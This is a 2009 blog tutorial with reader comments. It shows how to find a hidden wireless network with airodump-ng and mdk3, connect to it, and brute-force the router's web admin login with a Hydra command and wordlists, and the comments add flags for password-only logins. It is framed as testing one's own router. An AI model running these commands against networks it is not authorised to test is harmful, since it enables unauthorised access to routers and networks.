Monday, 11 May 2009

Using Hydra after connecting to network

After gaining access to your network, you can check the strength of your router's access passwords by using a tool called Hydra from THC.
Hydra is a login / password bruteforce cracker which uses password/dictionary files.

First we find our network and do what is needed to log in
In this case my test setup is;
* Eee PC 900, using the built in Atheros wireless.
* Open network with hidden SSID on channel 3, no clients attached, no mac filtering enabled.

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0 -f 1500 -t OPN -a
(using the -f function to slow down the channel hopping and -t option to filter out open networks)




After finding the network and relevant info with airodump, I'll use my custom ssid wordlist to crack the hidden ssid ;
mdk3 ath0 p -c 2 -t 00:13:D4:09:32:60 -f /mnt/sda1/ssid.txt -s 50
Depending on how often the AP sends beacons it can take a while to start, it will also show other networks broadcasting.





So now we have all the info we need to connect to this open network.
We start by stopping the wireless interface which is now still in monitor mode and
recreate in managed mode and then enter in the information we have acquired to access network and check for success;

airmon-ng stop ath0
wlanconfig ath0 create wlandev wifi0 wlanmode sta
iwconfig ath0 channel 2 essid TEST ap 00:13:D4:09:32:60
ifconfig ath0 up
iwconfig ath0




Success ! (see link quality? we have a connection!)

Now to see whether the AP has DHCP enabled so we can automatically get an IP address using dhcpcd with the -t option to give a time limit and the -d to give some extra info on our MAC and IP address when given.
When successful we can do a netstat to see what IP address the router is using (gateway);

dhcpcd -t 30 -d ath0
netstat -nr









So now we know that the router can be found on IP address 192.168.200.1, lets try to log in using some standard password combinations..



No luck..





OK, so now we will attempt to use Hydra.
Note the address line in the browser; http://192.168.200.1/index.asp
I have wordlists stored on my sda1 drive which have been prepared using a combination of default passwords and regularly used ones.

hydra 192.168.200.1 -L /mnt/sda1/login.txt -P /mnt/sda1/password.txt -t 2 -e ns -f http-get /index.asp
This can take a while, and so to speed things up I tweaked my custom wordlist a bit.




Success !

So now using the above found working login and password, we try to login again;



We're in !





So now we are in the router and can make changes as we see fit !
And make sure that the security is increased..


Here is a video showing going from cracking a hidden ssid, cracking WEP encryption and hacking the router;
http://blip.tv/file/1705288

4 comments:

  1. I understand this blog maywell be completly dead by now however i cannot find relevant information via google and such on my problem that has to do with this blog entry.

    I have followed your instruction on my test router at home and have hit a snag in the section where we start hydra. the router i use has a password field but there is no username. Hydra cannot be run (apparently) without a username aswell as a password list, i understand its not common to have only a password but there should be some ability to still use this method on a rarer system right?

    thanks for your time and i have quite enjoyed you blog.

    ReplyDelete
  2. This blog is far from dead I would hope ;)
    Last post is only 3 weeks ago !


    Try this for the user login ;

    -l ""

    That should basically tell hydra that the username is nothing.

    Pleased to hear if it works.

    ReplyDelete
  3. I believe the option "-e ns" fixes this.

    ReplyDelete
  4. -e ns
    additional checks;
    "n" for null password,
    "s" try login as pass

    So not quite the same as checking for no login, but perhaps is possible.
    If it works, please revert to contribute !

    ReplyDelete